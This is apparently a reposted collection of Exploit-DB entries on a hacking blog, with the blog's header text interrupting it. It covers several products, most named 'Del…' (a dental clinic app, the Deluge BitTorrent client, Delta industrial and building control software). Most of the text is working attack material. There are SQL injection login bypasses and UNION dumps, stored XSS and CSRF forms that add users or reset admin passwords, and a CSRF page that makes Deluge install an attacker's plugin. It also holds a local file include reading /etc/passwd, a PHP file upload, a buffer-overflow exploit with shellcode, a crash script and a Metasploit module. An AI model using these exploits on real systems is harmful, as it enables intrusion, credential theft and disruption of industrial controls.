# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass (SQLi)
# Date: 12.05.2021
# Exploit Author: Mesut Cetin
# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: Ubuntu 18.04 TLS
# Description:
# Attacker can bypass admin login page due to unsanitized user input and access internal contents
# vulnerable code in /admin/index.php, line 34:
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
# payload: admin' or '1' = '1 -- -
# Proof of concept:
http://localhost/admin/index.php
POST /admin/index.php HTTP/1.1
Host: localhost
Content-Length: 54
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; E6653 Build/32.2.A.0.253) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/admin/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=3cjdtku76ggasqei49gng91p3p
dnt: 1
sec-gpc: 1
Connection: close
username=admin'+or+'1'%3d1+--+-&password=test&submit=
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863151871
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - 'Firstname' Persistent Cross Site Scripting (Authenticated)
# Date: 14-05-2021
# Exploit Author: Reza Afsahi
# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: Linux parrot
# --- Description --- #
# The web application allows member to inject persistent Cross-Site-Scripting payload which will be executed in both member and Admin panel
# --- Proof of concept --- #
1- Create account and login as member and go to: http://localhost/APR/edit_info.php
2- Inject this payload into Firstname input : <script>alert(document.cookie)</script>
4- and fill other inputs as you want (Other inputs might be vulnerable as well) then click on Update button.
5- refresh the page and Xss popup will be triggered.
6- Now if Admin visit this page in his/her Dashboard : http://localhost/APR/admin/members.php
7- Our Xss payload will be executed on Admin Browser
** Attacker can use this vulnerability to take over Admin account **
# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - 'date' UNION based SQL Injection (Authenticated)
# Date: 12.05.2021
# Exploit Author: Mesut Cetin
# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
# Version: 1.0
# Tested on: Ubuntu 18.04 TLS
# Description:
# the 'date' POST parameter is vulnerable to UNION-based SQL Injection
# Attacker can use it to retrieve sensitive data like usernames, passwords, versions, etc.
# payload: ' UNION SELECT NULL,NULL,@@version,username,password,NULL FROM users -- -
# Proof of concept:
http://localhost/admin/sort_date.php
POST /admin/sort_date.php HTTP/1.1
Host: localhost
Content-Length: 84
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/admin/sort_date.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=3cjdtku76ggasqei49gng91p3p
dnt: 1
sec-gpc: 1
Connection: close
date='+UNION+SELECT+NULL,NULL,@@version,username,password,NULL+FROM+users+--+-&sort=
# # # # #
# Exploit Title: Delux Same Day Delivery Script v1.0 - SQL Injection
# Google Dork: N/A
# Date: 26.03.2017
# Vendor Homepage: http://eagletechnosys.com/
# Software: http://www.eaglescripts.com/delux-same-day-delivery
# Demo: http://deluxesameday.logistic-softwares.com/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/show_page/[PAGE][SQL]
# Etc...
# # # # #
<!--
Remote code execution via CSRF vulnerability in the web UI of Deluge 1.3.13
Kyle Neideck, February 2017
Product
-------
Deluge is a BitTorrent client available from http://deluge-torrent.org.
Fix
---
Fixed in the (public) source code, but not in binary releases yet. See
http://git.deluge-torrent.org/deluge/commit/?h=develop&id=11e8957deaf0c76fdfbac62d99c8b6c61cfdddf9
and
http://git.deluge-torrent.org/deluge/commit/?h=1.3-stable&id=318ab179865e0707d7945edc3a13a464a108d583
Install from source or use the web UI from an incognito/private window until
new binaries are released.
Summary
-------
Deluge version 1.3.13 is vulnerable to cross-site request forgery in the Web UI
plug-in resulting in remote code execution. Requests made to the /json endpoint
are not checked for CSRF. See the "render" function of the "JSON" class in
deluge/ui/web/json_api.py.
The Web UI plug-in is installed, but not enabled, by default. If the user has
enabled the Web UI plug-in and logged into it, a malicious web page can use
forged requests to make Deluge download and install a Deluge plug-in provided
by the attacker. The plug-in can then execute arbitrary code as the user
running Deluge (usually the local user account).
Timeline
--------
2017-03-01 Disclosed the vulnerability to Calum Lind (Cas) of Deluge Team
2017-03-01 Vulnerability fixed by Calum Lind
2017-03-05 Advisory released
To Reproduce
------------
- Create/find a Deluge plug-in to be installed on the victim machine. For
example, create an empty plug-in with
python deluge/scripts/create_plugin.py --name malicious --basepath . \
--author-name "n" --author-email "e"
(see
http://git.deluge-torrent.org/deluge/tree/deluge/scripts/create_plugin.py?h=1.3-stable&id=318ab179865e0707d7945edc3a13a464a108d583)
and add a line to its __init__.py to launch calc.exe.
- Build the plug-in as a .egg (if necessary):
python malicious/setup.py bdist_egg
- Make a torrent containing the .egg and seed it somewhere.
- Create a Magnet link for the torrent.
- In the proof-of-concept page below, update the PLUGIN_NAME, PLUGIN_FILE and
MAGNET_LINK constants.
- Put the PoC on a web server somewhere. Serving it locally is fine.
- In Deluge, open Preferences, go to the Plugins category and enable the Web
UI plug-in.
- Go to the WebUi preferences section and check "Enable web interface". The
port should be set to 8112 by default.
- If you're serving the PoC over HTTPS, check "Enable SSL" so its requests
don't get blocked as mixed content. If you're not, SSL can be enabled or
disabled.
- Go to localhost:8112 in a browser on the victim machine and log in.
- Open the PoC in the same browser.
The PoC sends requests to localhost:8112 that include cookies. The first
request adds the torrent, which downloads the .egg (the plug-in) to /tmp. It
then sends repeated requests to install the .egg and enable it. The attacker's
code in the plug-in runs when the plug-in is enabled.
For the attack to be successful, the PoC page must be left open until the
malicious plug-in finishes downloading. An attacker could avoid that limitation
by using the Execute plug-in, which is installed by default, but Deluge has to
be restarted before the Execute plug-in can be used. I don't think that can be
done from the web UI, so the attacker's code would only execute after the
victim restarted Deluge and then added/removed/completed a torrent.
The PoC adds the plug-in torrent using a Magnet link because it would need to
read the web UI's responses to add a .torrent file, which CORS prevents.
Proof of Concept
----------------
-->
<!--
Deluge 1.3.13 Web UI CSRF
Tested on Linux, macOS and Windows.
Kyle Neideck, February 2017
kyle@bearisdriving.com
-->
<html><body><script>
let PLUGIN_NAME = 'malicious';
let PLUGIN_FILE = 'malicious-0.1-py2.7.egg';
let MAGNET_LINK =
'magnet:?xt=urn:btih:1b02570de69c0cb6d12c544126a32c67c79024b4' +
'&dn=malicious-0.1-py2.7.egg' +
'&tr=http%3A%2F%2Ftracker.example.com%3A6969%2Fannounce';
function send_deluge_json(json) {
console.log('Sending: ' + json);
for (let proto of ['http','https']) {
let xhr = new XMLHttpRequest();
xhr.open('POST', proto + '://localhost:8112/json');
xhr.setRequestHeader('Content-Type', 'text/plain');
xhr.withCredentials = true;
xhr.onload = function() { console.log(xhr); };
xhr.send(json);
}
}
let download_location =
(navigator.appVersion.indexOf("Win") != -1) ?
'C:\\\\Users\\\\Public' : '/tmp';
// Download a malicious plugin using a Magnet link.
//
// Using the /upload endpoint or adding a .torrent file wouldn't work. We could
// upload the file (either a .torrent or the plug-in itself), but it would be
// saved in a temp dir with a random name. CORS would prevent us from reading
// the path to the file from the response, and to finish the process we'd need
// to send a second request that includes that path.
send_deluge_json('{' +
'"method":"web.add_torrents",' +
'"params":[[{' +
'"path":"' + MAGNET_LINK + '",' +
'"options":{' +
'"file_priorities":[],' +
'"add_paused":false,' +
'"compact_allocation":false,' +
'"download_location":"' + download_location + '",' +
'"move_completed":false,' +
'"move_completed_path":"' + download_location + '",' +
'"max_connections":-1,' +
'"max_download_speed":-1,' +
'"max_upload_slots":-1,' +
'"max_upload_speed":-1,' +
'"prioritize_first_last_pieces":false}}]],' +
'"id":12345}');
window.stop = false;
// Repeatedly try to enable the plugin, since we can't tell when it will finish
// downloading.
function try_to_add_and_enable_plugin() {
send_deluge_json('{' +
'"method":"web.upload_plugin",' +
'"params":["' + PLUGIN_FILE + '","' +
download_location + '/' + PLUGIN_FILE + '"],' +
'"id":12345}');
send_deluge_json('{' +
'"method":"core.enable_plugin",' +
'"params":["' + PLUGIN_NAME + '"],' +
'"id":12345}');
if (!window.stop) {
window.setTimeout(try_to_add_and_enable_plugin, 500);
}
}
try_to_add_and_enable_plugin();
</script>
<button onclick="window.stop = true">Stop sending requests</button>
</body></html>
#Exploit Title: Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-20
#Vendor Homepage: https://dev.deluge-torrent.org/
#Software Link: http://download.deluge-torrent.org/windows/deluge-1.3.15-win32-py2.7.exe
#Tested Version: 1.3.15
#Tested on: Windows 7 Service Pack 1 x64
#Steps to produce the crash:
#1.- Run python code: deluge_web.py
#2.- Open deluge_web.txt and copy content to clipboard
#3.- Open deluge.exe
#4.- Select "File" > "Create Torrent"
#5.- In "Webseeds" field paste Clipboard
#6.- Crashed
cod = "\x41" * 5000
f = open('deluge_web.txt', 'w')
f.write(cod)
f.close()
#Exploit Title: Deluge 1.3.15 - 'URL' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-20
#Vendor Homepage: https://dev.deluge-torrent.org/
#Software Link: http://download.deluge-torrent.org/windows/deluge-1.3.15-win32-py2.7.exe
#Tested Version: 1.3.15
#Tested on: Windows 7 Service Pack 1 x64
#Steps to produce the crash:
#1.- Run python code: deluge_url.py
#2.- Open deluge_url.txt and copy content to clipboard
#3.- Open deluge.exe
#4.- Select "File" > "Add Torrent" > "URL"
#5.- In "From URL" field paste Clipboard
#6.- Select "OK"
#7.- Crashed
cod = "\x41" * 5000
f = open('deluge_url.txt', 'w')
f.write(cod)
f.close()
# Exploit Title: Maconomy Erp local file include
# Date: 22/05/2019
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com
# Vendor Homepage: https://www.deltek.com
# Software Link: https://www.deltek.com/en-gb/products/project-erp/maconomy
# CVE: CVE-2019-12314
POC:
POC:
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//LFI
Example
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd
source: https://www.securityfocus.com/bid/55478/info
DeltaScripts PHP Links is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
DeltaScripts PHP Links 2012 is vulnerable; other versions may also be affected.
http://www.example.com/phplinks/index.php?catid=[SQL]
http://www.example.com/phplinks/review.php?id=[SQL]
http://www.example.com/phplinks/search.php?search=[SQL]
http://www.example.com/phplinks/admin/adm_fill_options.php?field=[SQL]
http://www.example.com/phplinks/vote.php
In POST method :
id=[SQL]&rating=
http://www.example.com/phplinks/admin/adm_login.php
In POST method :
admin_password=test&admin_username=[SQL]&submit=Login
http://www.example.com/phplinks/login.php
In POST method :
email=[SQL]&forgotten=&password=[SQL]&submit=Login
# Exploit Title: Delta Sql 1.8.2 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-10-25
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://deltasql.sourceforge.net/
# Software Link: https://sourceforge.net/projects/deltasql/files/latest/download
# Software Link: http://deltasql.sourceforge.net/deltasql/
# Version: 1.8.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/docs_manage.php?id=1
#
# http://localhost/[PATH]/upload/[FILE]
POST /[PATH]/docs_upload.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/[PATH]/docs_manage.php?id=1
Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=
---------------------------158943328914318561992147220435
Content-Length: 721
-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="fileToUpload"; filename="Efe.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="submit"
Upload File
-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="id"
1
-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="version"
-----------------------------158943328914318561992147220435
Content-Disposition: form-data; name="hasdocs"
-----------------------------158943328914318561992147220435--
HTTP/1.1 200 OK
Date: Thu, 24 Oct 2018 00:24:27 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1783
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<html>
<body>
<form action="http://localhost/[PATH]/docs_upload.php" method="post" enctype="multipart/form-data">
Select document to upload:
<input name="fileToUpload" id="fileToUpload" type="file">
<input value="Ver Ayari" name="submit" type="submit">
<input value="1" name="id" type="hidden">
<input value="1'" name="version" type="hidden">
<input value="1" name="hasdocs" type="hidden">
</form>
</body>
</html>
# Exploit Title: Delta Sql 1.8.2 - 'id' SQL Injection
# Dork: N/A
# Date: 2018-10-25
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://deltasql.sourceforge.net/
# Software Link: https://sourceforge.net/projects/deltasql/files/latest/download
# Software Link: http://deltasql.sourceforge.net/deltasql/
# Version: 1.8.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/docs_manage.php?id=[SQL]&version=1&hasdocs=1
GET /[PATH]/docs_manage.php?id=1++uNiOn+seleCt+0x31,0x32,(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x),0x34,0x35--+-&version=1&hasdocs=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 24 Oct 2018 00:12:57 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/list_project_modules.php?id=[SQL]&name=1
GET /[PATH]/list_project_modules.php?id=-1%20union%20select%20null,(0x32),null--&name=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=ra5c0bgati64a01fag01l8hhf0
Connection: keep-alive
HTTP/1.1 200 OK
Date: Thu, 24 Oct 2018 00:08:03 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2150
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
#!/usr/bin/env python
#
#
# Delta Industrial Automation DCISoft 1.12.09 Stack Buffer Overflow Exploit
#
#
# Vendor: Delta Electronics, Inc.
# Product web page: http://www.delta.com.tw
# Software link: http://www.delta.com.tw/product/em/download/download_main.asp?act=3&pid=3&cid=5&tpid=3
# Affected version: 1.12.09 (Build 12102014)
#
# Summary: DCISoft is a integrated configuration tool of Delta
# network modules (DVPEN01-SL, RTU-EN01, IFD9506, IFD9507, DVPSCM12-SL,
# DVPSCM52-SL) for WINDOWS operation system.
#
# Desc: The vulnerability is caused due to a boundary error in
# the processing of a project file, which can be exploited to
# cause a stack based buffer overflow when a user opens e.g. a
# specially crafted .DCI file. Successful exploitation allows
# execution of arbitrary code on the affected machine.
#
# ----------------------------------------------------------------------------
# (1554.1830): Access violation - code c0000005 (!!! second chance !!!)
# eax=00000001 ebx=0018f684 ecx=44444444 edx=777a4a20 esi=0018f65c edi=777a4a20
# eip=73d34b64 esp=0018cdd8 ebp=0018cdec iopl=0 nv up ei pl nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
# MFC42!Ordinal2740+0x88:
# 73d34b64 8b01 mov eax,dword ptr [ecx] ds:002b:44444444=????????
# 0:000> d esp
# 0018cdd8 1c f6 18 00 a8 a5 47 00-01 00 00 00 01 00 00 00 ......G.........
# 0018cde8 5c f6 18 00 fc cd 18 00-a4 59 41 00 e1 b5 85 88 \........YA.....
# 0018cdf8 5c f6 18 00 d8 f8 18 00-fa 38 41 00 84 f6 18 00 \........8A.....
# 0018ce08 c8 8f 74 02 e8 1f 7c 02-04 ce 18 00 c8 8f 74 02 ..t...|.......t.
# 0018ce18 04 ce 18 00 44 44 44 44-44 44 44 44 44 44 44 44 ....DDDDDDDDDDDD
# 0018ce28 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
# 0018ce38 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
# 0018ce48 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
# --
# (11bc.1394): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# Defaulted to export symbols for C:\Program Files (x86)\Delta Industrial Automation\Communication\DCISoft 1.12\MFC42.DLL -
# eax=0018cdfc ebx=0018f684 ecx=0018cdec edx=ce085164 esi=0018f65c edi=31f7ae9c
# eip=43434343 esp=0018cdcc ebp=0018cdec iopl=0 nv up ei pl nz ac pe cy
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210217
# 43434343 ?? ???
# ----------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
# Microsoft Windows 7 Ultimate SP1 (EN)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2016-5305
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5305.php
#
#
# 13.11.2015
#
sc = ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x65\x64"
"\x21\x01\x68\x20\x50\x77\x6e\x68\x20\x5a\x53\x4c\x89\xe1\xfe"
"\x49\x0b\x31\xc0\x51\x50\xff\xd7")
buffer = "\x41" * 156 # align
buffer += "\x3c\xce\x18\x00" # eip - jmp esp+49h
buffer += "\x90" * 15 # nopsled
buffer += sc # 113 bytes messagebox shellcode
buffer += "\x44" * 7926 # extra shellcode space
buffer += "\xec\xcd\x18\x00" # overwrite data segment to control eip - mov eax,dword ptr [ecx]
buffer += "\x45" * 2203 # padding to fix 10421 bytes
f = open ("Detachment.dci", "w")
f.write(buffer)
f.close()
print "File Detachment.dci successfully created!\n"
# Exploit Title: Delta Electronics Delta Industrial Automation COMMGR
- Remote STACK-BASED BUFFER OVERFLOW
# Date: 02.07.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.deltaww.com/
# Software Link: http://www.deltaww.com/Products/PluginWebUserControl/downloadCenterCounter.aspx?DID=2093&DocPath=1&hl=en-US
# Version:
COMMGR Version 1.08 and prior.
DVPSimulator EH2, EH3, ES2, SE, SS2
AHSIM_5x0, AHSIM_5x1
# Tested on: Kali Linux
# CVE : CVE-2018-10594
#Run exploit, result DOS
import socket
ip = raw_input("[+] IP to attack: ")
sarr = []
i = 0
while True:
try:
sarr.append(socket.create_connection((ip,80)))
print "[+] Connection %d" % i
crash1 = "\x41"*4412 +"\X42"*1000
sarr[i].send(crash1+'\r\n')
i+=1
except socket.error:
print "[*] Server crashed "
raw_input()
break
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial
Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially
crafted packets. This module has been tested successfully on Delta Electronics Delta
Industrial Automation COMMGR 1.08 over
Windows XP SP3,
Windows 7 SP1, and
Windows 8.1.
},
'Author' =>
[
'ZDI', # Initial discovery
't4rkd3vilz', # PoC
'hubertwslin' # Metasploit module
],
'References' =>
[
[ 'CVE', '2018-10594' ],
[ 'BID', '104529' ],
[ 'ZDI', '18-586' ],
[ 'ZDI', '18-588' ],
[ 'EDB', '44965' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01' ]
],
'Payload' =>
{
'Space' => 640,
'DisableNops' => true,
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Platform' => 'win',
'Targets' =>
[
[ 'COMMGR 1.08 / Windows Universal',
{
'Ret' => 0x00401e14, # p/p/r COMMGR.exe
'Offset' => 4164
}
],
],
'DisclosureDate' => 'Jul 02 2018',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(502)
])
end
def exploit
data = rand_text_alpha(target['Offset'])
data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled
data << [target.ret].pack("V")
data << make_nops(40)
data << payload.encoded
print_status("Trying target #{target.name}, sending #{data.length} bytes...")
connect
sock.put(data)
disconnect
end
end
# Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)
# Exploit Author: LiquidWorm
<!DOCTYPE html>
<html>
<head><title>enteliTouch XSS</title></head>
<body>
<!--
Delta Controls enteliTOUCH 3.40.3935 Cross-Site Scripting (XSS)
Vendor: Delta Controls Inc.
Product web page: https://www.deltacontrols.com
Affected version: 3.40.3935
3.40.3706
3.33.4005
Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
access to the heart of your BAS. The enteliTOUCH has a 7-inch,
high-resolution display that serves as an interface to your building.
Use it as your primary interface for smaller facilities or as an
on-the-spot access point for larger systems. The intuitive,
easy-to-navigate interface gives instant access to manage your BAS.
Desc: Input passed to the POST parameter 'Username' is not properly
sanitised before being returned to the user. This can be exploited
to execute arbitrary HTML code in a user's browser session in context
of an affected site.
Tested on: DELTA enteliTOUCH
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5703
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5703.php
06.04.2022
-->
<form action="http://192.168.0.210/deltaweb/hmi_userconfig.asp" method="POST">
<input type="hidden" name="userInfo" value="" />
<input type="hidden" name="UL_SelectedOptionId" value="" />
<input type="hidden" name="Username" value=""></script><script>alert(document.cookie)</script>" />
<input type="hidden" name="formAction" value="Delete" />
<input type="submit" value="CSRF XSS Alert!" />
</form>
</body>
</html>
# Exploit Tile: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)
# Exploit Author: LiquidWorm
<!DOCTYPE html>
<html>
<head><title>enteliTouch CSRF</title></head>
<body>
<!--
Delta Controls enteliTOUCH 3.40.3935 Cross-Site Request Forgery (CSRF)
Vendor: Delta Controls Inc.
Product web page: https://www.deltacontrols.com
Affected version: 3.40.3935
3.40.3706
3.33.4005
Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
access to the heart of your BAS. The enteliTOUCH has a 7-inch,
high-resolution display that serves as an interface to your building.
Use it as your primary interface for smaller facilities or as an
on-the-spot access point for larger systems. The intuitive,
easy-to-navigate interface gives instant access to manage your BAS.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: DELTA enteliTOUCH
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5702
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5702.php
06.04.2022
-->
CSRF Add User:
<form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Add&userName=&userPassword=" method="POST">
<input type="hidden" name="actionName" value="" />
<input type="hidden" name="Username" value="zsl" />
<input type="hidden" name="Password" value="123t00t" />
<input type="hidden" name="AutoLogout" value="17" />
<input type="hidden" name="SS_SelectedOptionId" value="FIL28" />
<input type="hidden" name="ObjRef" value="" />
<input type="hidden" name="Apply" value="true" />
<input type="hidden" name="formAction" value="Add" />
<input type="submit" value="Go for UserAdd" />
</form>
<br />
CSRF Change Admin Password (default: delta:login):
<form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Edit&userName=DELTA&userPassword=baaah" method="POST">
<input type="hidden" name="actionName" value="" />
<input type="hidden" name="Username" value="DELTA" />
<input type="hidden" name="Password" value="123456" />
<input type="hidden" name="AutoLogout" value="30" />
<input type="hidden" name="SS_SelectedOptionId" value="" />
<input type="hidden" name="ObjRef" value="ZSL-251" />
<input type="hidden" name="Apply" value="true" />
<input type="hidden" name="formAction" value="Edit" />
<input type="submit" value="Go for UserEdit" />
</form>
</body>
</html>
Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure
Exploit Author: LiquidWorm
Vendor: Delta Controls Inc.
Product web page: https://www.deltacontrols.com
Affected version: 3.40.3935
3.40.3706
3.33.4005
Summary: enteliTOUCH - Touchscreen Building Controller. Get instant
access to the heart of your BAS. The enteliTOUCH has a 7-inch,
high-resolution display that serves as an interface to your building.
Use it as your primary interface for smaller facilities or as an
on-the-spot access point for larger systems. The intuitive,
easy-to-navigate interface gives instant access to manage your BAS.
Desc: The application suffers from a cleartext transmission/storage
of sensitive information in a Cookie. This allows a remote
attacker to intercept the HTTP Cookie authentication credentials
through a man-in-the-middle attack.
Tested on: DELTA enteliTOUCH
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2022-5704
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5704.php
06.04.2022
--
GET /deltaweb/hmi_useredit.asp?ObjRef=BAC.1000.ZSL3&formAction=Edit HTTP/1.1
